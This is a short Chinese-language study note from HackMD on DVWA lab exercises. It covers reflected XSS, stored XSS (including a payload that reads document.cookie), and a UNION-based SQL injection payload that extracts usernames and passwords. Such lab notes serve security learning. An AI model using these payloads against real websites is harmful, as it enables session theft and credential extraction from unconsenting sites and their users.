# dvwa XSS ###### tags: xss ## Reflected Cross Site Scripting (XSS)  - 在未過濾使用者輸入的情況下,攻擊者可輸入帶有執行程式碼之輸入文字 - 輸入後反射到瀏覽器執行 - 攻擊語法 ```=javascript <script>alert(1)</script> ``` -  ## 儲存型XSS ( Stored )  - 誘發在留言板等能儲存文字的地方,使用者的輸入會被儲存到伺服器端,等到下個受害者拜訪該頁面時,xss語法就會再度被執行處發 -  -  -  ```-javascript <script>alert(document.cookie)</script> ``` ## SQL INJECTION SELECT First_Name,Surname WHERE ID='$ID'; - 查詢password ``` 1' and 1=2 union select user,password from users # ```
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up